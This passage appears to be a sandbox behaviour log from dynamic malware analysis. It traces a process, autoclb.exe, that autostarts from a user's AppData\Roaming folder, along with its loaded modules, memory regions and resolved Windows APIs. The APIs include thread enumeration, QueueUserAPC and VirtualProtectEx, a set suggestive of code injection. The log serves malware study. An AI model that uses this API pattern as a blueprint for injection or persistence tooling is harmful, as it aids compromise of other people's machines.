ProcedureAddress=0x9eda67f910*=0x7ff8ee3e38f0) returned 0x0 [0077.857] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="LoadLibraryExW", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2eb820) returned 0x0 [0077.857] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetProcAddress", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2eaa40) returned 0x0 [0077.857] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="VirtualFree", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2ebc10) returned 0x0 [0077.857] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetLogicalDriveStringsW", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f59d0) returned 0x0 [0077.858] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetFileAttributesA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5900) returned 0x0 [0077.858] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="OpenFileMappingA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f3c10) returned 0x0 [0077.858] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetExitCodeProcess", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2ee450) returned 0x0 [0077.858] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="CreateProcessA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2ed5b0) returned 0x0 [0077.858] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="lstrcpynA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee3136c0) returned 0x0 [0077.858] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="LocalReAlloc", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f2c80) returned 0x0 [0077.858] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="TlsAlloc", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2edec0) returned 0x0 [0077.858] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="TlsGetValue", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2e6020) returned 0x0 [0077.858] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="TlsSetValue", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2e64c0) returned 0x0 [0077.858] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="LoadLibraryW", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2eed90) returned 0x0 [0077.858] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetVersionExW", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2eaa30) returned 0x0 [0077.858] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="FreeLibrary", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2eeb90) returned 0x0 [0077.858] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="ReadFile", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5a90) returned 0x0 [0077.858] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="SetFilePointer", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5b20) returned 0x0 [0077.858] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="Thread32First", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f01b0) returned 0x0 [0077.858] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="QueueUserAPC", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2efe40) returned 0x0 [0077.858] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="CreateToolhelp32Snapshot", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f6830) returned 0x0 [0077.858] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="OpenThread", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2ea970) returned 0x0 [0077.858] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="Thread32Next", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2e6720) returned 0x0 [0077.858] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="FindFirstFileA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5800) returned 0x0 [0077.858] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="FindNextFileA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5860) returned 0x0 [0077.858] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="ConnectNamedPipe", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f30b0) returned 0x0 [0077.859] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetOverlappedResult", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2ebb70) returned 0x0 [0077.859] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="CancelIo", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f2f50) returned 0x0 [0077.859] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="DisconnectNamedPipe", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f3820) returned 0x0 [0077.859] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="FlushFileBuffers", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5890) returned 0x0 [0077.859] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="CallNamedPipeA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee30fe50) returned 0x0 [0077.859] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="CreateNamedPipeA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee310070) returned 0x0 [0077.859] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetSystemTime", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2ea940) returned 0x0 [0077.859] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="WaitNamedPipeA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee310670) returned 0x0 [0077.859] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetCurrentProcessId", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2e6070) returned 0x0 [0077.859] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="SleepEx", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f56d0) returned 0x0 [0077.859] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="RemoveVectoredExceptionHandler", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee3fa5b0) returned 0x0 [0077.859] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="AddVectoredExceptionHandler", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee3ea7b0) returned 0x0 [0077.859] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="OpenEventA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5630) returned 0x0 [0077.859] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="lstrcmpiW", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2e65d0) returned 0x0 [0077.859] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="RaiseException", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2eeba0) returned 0x0 [0077.859] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetSystemInfo", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2ef580) returned 0x0 [0077.859] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="Process32NextW", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2eb8f0) returned 0x0 [0077.859] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="Process32FirstW", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f0020) returned 0x0 [0077.859] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="QueueUserWorkItem", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f0f60) returned 0x0 [0077.859] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="FileTimeToLocalFileTime", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f57b0) returned 0x0 [0077.859] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="FindClose", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f57c0) returned 0x0 [0077.859] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetDriveTypeW", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f58f0) returned 0x0 [0077.860] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="VirtualProtectEx", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee313630) returned 0x0 [0077.860] LdrLoadDll (SearchPath=0x0, LoadFlags=0x0, Name="AVIFIL32.dll", BaseAddress=0x9eda67f928) Thread: id = 25 os_tid = 0xfe0 Process: id = "9" image_name = "autoclb.exe" filename = "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adsldraw\\autoclb.exe" page_root = "0x2dd99000" os_pid = "0x5f0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00018e8d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 719 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 720 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 721 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 722 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 723 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 724 start_va = 0x400000 end_va = 0x512fff entry_point = 0x400000 region_type = mapped_file name = "autoclb.exe" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adsldraw\\autoclb.exe") Region: id = 725 start_va = 0x779b0000 end_va = 0x77b28fff entry_point = 0x779b0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 726 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 727 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 728 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 729 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 730 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 731 start_va = 0x7fff0000 end_va = 0x7ff977f2ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 732 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 733 start_va = 0x7ff9780f2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ff9780f2000" filename = "" Region: id = 872 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 873 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 874 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 875 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 876 start_va = 0x61eb0000 end_va = 0x61efefff entry_point = 0x61eb0000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 877 start_va = 0x61f10000 end_va = 0x61f82fff entry_point = 0x61f10000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 878 start_va = 0x61f00000 end_va = 0x61f07fff entry_point = 0x61f00000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 879 start_va = 0x650000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 880 start_va = 0x74d70000 end_va = 0x74e5ffff entry_point = 0x74d70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 881 start_va = 0x77830000 end_va = 0x779a5fff entry_point = 0x77830000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 882 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 883 start_va = 0x1d0000 end_va = 0x28dfff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 884 start_va = 0x749b0000 end_va = 0x74a40fff entry_point = 0x749b0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 885 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 886 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 887 start_va = 0x290000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 888 start_va = 0x520000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 889 start_va = 0x74900000 end_va = 0x74991fff entry_point = 0x74900000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 890 start_va = 0x749a0000 end_va = 0x749a7fff entry_point = 0x749a0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 891 start_va = 0x74a50000 end_va = 0x74aa8fff entry_point = 0x74a50000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 892 start_va = 0x74ab0000 end_va = 0x74ab9fff entry_point = 0x74ab0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 893 start_va = 0x74ac0000 end_va = 0x74addfff entry_point = 0x74ac0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 894 start_va = 0x74ae0000 end_va = 0x74b22fff entry_point = 0x74ae0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 895 start_va = 0x74bb0000 end_va = 0x74d69fff entry_point = 0x74bb0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 896 start_va = 0x75190000 end_va = 0x751d3fff entry_point = 0x75190000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 897 start_va = 0x75210000 end_va = 0x765cefff entry_point = 0x75210000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 898 start_va = 0x765d0000 end_va = 0x7665cfff entry_point = 0x765d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 899 start_va = 0x766f0000 end_va = 0x7682ffff entry_point = 0x766f0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 900 start_va = 0x76a50000 end_va = 0x76f2cfff entry_point = 0x76a50000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 901 start_va = 0x770a0000 end_va = 0x770e3fff entry_point = 0x770a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 902 start_va = 0x770f0000 end_va = 0x7719bfff entry_point = 0x770f0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 903 start_va = 0x77200000 end_va = 0x7720bfff entry_point = 0x77200000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 904 start_va = 0x77340000 end_va = 0x7734efff entry_point = 0x77340000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 905 start_va = 0x773b0000 end_va = 0x774fcfff entry_point = 0x773b0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 906 start_va = 0x77510000 end_va = 0x7758afff entry_point = 0x77510000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 907 start_va = 0x77600000 end_va = 0x776bdfff entry_point = 0x77600000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 908 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 909 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 910 start_va = 0x750000 end_va = 0x8d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 911 start_va = 0x751e0000 end_va = 0x7520afff entry_point = 0x751e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 912 start_va = 0x76890000 end_va = 0x769affff entry_point = 0x76890000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 913 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 914 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 915 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 916 start_va = 0x8e0000 end_va = 0xa60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 917 start_va = 0xa70000 end_va = 0x1e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 918 start_va = 0x1e70000 end_va = 0x1feffff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 919 start_va = 0x1e70000 end_va = 0x1f20fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 920 start_va = 0x1fe0000 end_va = 0x1feffff entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 921 start_va = 0x390000 end_va = 0x3fefff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 922 start_va = 0x2e0000 end_va = 0x2e1fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 941 start_va = 0x1ff0000 end_va = 0x2166fff entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 942 start_va = 0x2170000 end_va = 0x22e8fff entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 943 start_va = 0x1ff0000 end_va = 0x2166fff entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 944 start_va = 0x2170000 end_va = 0x22e8fff entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 945 start_va = 0x1ff0000 end_va = 0x2166fff entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 946 start_va = 0x2170000 end_va = 0x22e8fff entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 948 start_va = 0x1ff0000 end_va = 0x2166fff entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 949 start_va = 0x2170000 end_va = 0x22e8fff entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 950 start_va = 0x1f30000 end_va = 0x1fa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f30000" filename = "" Region: id = 951 start_va = 0x1ff0000 end_va = 0x2166fff entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 952 start_va = 0x2170000 end_va = 0x22e8fff entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 953 start_va = 0x1ff0000 end_va = 0x2166fff entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 954 start_va = 0x2170000 end_va = 0x22e8fff entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 989 start_va = 0x1ff0000 end_va = 0x2166fff entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 1001 start_va = 0x2170000 end_va = 0x22e8fff entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Thread: id = 26 os_tid = 0x4f8 [0195.146] GetStartupInfoW (in: lpStartupInfo=0x19ff18 | out: lpStartupInfo=0x19ff18*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0195.146] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0195.148] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74d70000 [0195.148] GetProcAddress (hModule=0x74d70000, lpProcName="FlsAlloc") returned 0x74d8a330 [0195.148] GetProcAddress (hModule=0x74d70000, lpProcName="FlsGetValue") returned 0x74d87580 [0195.148] GetProcAddress (hModule=0x74d70000, lpProcName="FlsSetValue") returned 0x74d89910 [0195.148] GetProcAddress (hModule=0x74d70000, lpProcName="FlsFree") returned 0x74d8f400 [0195.150] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74d70000 [0195.151] GetCurrentThreadId () returned 0x4f8 [0195.151] GetStartupInfoW (in: lpStartupInfo=0x19feb4 | out: lpStartupInfo=0x19feb4*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40d031, hStdOutput=0x40d36a, hStdError=0x1fe05a8)) [0195.151] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0195.151] 